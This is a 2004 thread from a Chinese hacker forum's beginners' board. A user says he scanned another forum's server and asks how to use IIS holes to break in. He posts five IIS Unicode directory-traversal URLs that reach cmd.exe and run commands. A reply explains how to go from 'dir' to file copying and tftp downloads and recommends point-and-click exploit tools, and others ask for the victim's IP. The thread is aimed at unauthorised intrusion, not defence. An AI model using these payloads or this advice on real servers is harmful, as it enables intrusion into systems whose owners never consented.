论坛: 菜鸟乐园 标题: 关于IIS 复制本贴地址    
作者: bluecat_ [bluecat_]    论坛用户   登录
本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来

我最近扫描出了一个论坛有很多IIS漏洞.....
但我对于漏洞这方面很少接触哦...有谁能教我怎样利用这漏洞来实现入侵?
我的QQ:235118233(注明"IIS")
                                                                  谢谢了

地主 发表时间: 04-08-14 09:09

回复: lqfrla [lqfrla]   论坛用户   登录
贴出来吧

B1层 发表时间: 04-08-14 09:42

回复: bluecat_ [bluecat_]   论坛用户   登录
什么贴出来?
你加我QQ把.....235118233

[此贴被 bluecat_(bluecat_) 在 08月14日10时00分 编辑过]

B2层 发表时间: 04-08-14 09:59

回复: NickJ [jiangxiao]   论坛用户   登录
你把你扫描到的漏洞贴出来 让大家看看撒 不然怎么帮你

B3层 发表时间: 04-08-14 13:50

回复: lijingxi [lijingxi]   见习版主   登录
还是贴出来方便一些!大家看看都发表一下自己的意见!互相学习! 但是不要把IP 贴出来!
现在IIS 能入侵成功的漏洞很少了!

B4层 发表时间: 04-08-14 15:13

回复: szjwwwww [szjwwwww]   论坛用户   登录
你扫到的是论坛的漏洞
还是iis的漏洞啊?
iis的漏洞很少有的

B5层 发表时间: 04-08-14 16:30

回复: zhangyanbo [zhangyanbo]   论坛用户   登录
是呀,告诉我有哪些IIS漏洞?

B6层 发表时间: 04-08-14 19:56

回复: bluecat_ [bluecat_]   论坛用户   登录
IIS编码/解码漏洞: http://IP/a.asp/..%c0%2f..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir



IIS编码/解码漏洞: http://IP/a.asp/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir



IIS编码/解码漏洞: http://IP/a.asp/..%c1%1c..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir



IIS编码/解码漏洞: http://IP/a.asp/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir



IIS编码/解码漏洞: http://IP/a.asp/..%c1%9f..%c1%9f..%c1%9f..%c1%9fwinnt/system32/cmd.exe?/c+dir


B7层 发表时间: 04-08-15 16:27

回复: bluecat_ [bluecat_]   论坛用户   登录
我已经贴出来了...怎么没人回?

B8层 发表时间: 04-08-16 00:49

回复: chiru [chiru]   论坛用户   登录
    你先直接看你扫出来的漏洞信息连接,比如http://ip/a.asp/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir,要是能看到他的硬盘文件,那么真的很恭喜你,这种漏洞好久没有看到过了.
    既然能使用dir命令,那么其它命令,诸如copy,move,md,rd之类当然可以用喽,那么,当然,tftp什么的命令也可以使用喽........
    实在不行去找个图形化的unicode漏洞入侵工具吧.省事

B9层 发表时间: 04-08-16 11:13

回复: lqfrla [lqfrla]   论坛用户   登录
对,楼上说的对
把“IP”换成有漏洞的IP直接连接就可以了
可否告我他的IP啊

B10层 发表时间: 04-08-16 11:21

回复: bluecat_ [bluecat_]   论坛用户   登录
好啊....加我QQ先.....235118233

B11层 发表时间: 04-08-16 16:19

回复: bluecat_ [bluecat_]   论坛用户   登录
to B8:
  具体怎样呢?我是第一次遇到这IIS漏洞的

B12层 发表时间: 04-08-16 17:05

回复: abctm [abctm]   版主   登录
现在这样漏洞能找到,把扫描结果贴

B13层 发表时间: 04-08-16 22:31

回复: bluecat_ [bluecat_]   论坛用户   登录
双星我已经贴了呀..........
是不是想拿IP地址哦

B14层 发表时间: 04-08-16 22:45

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号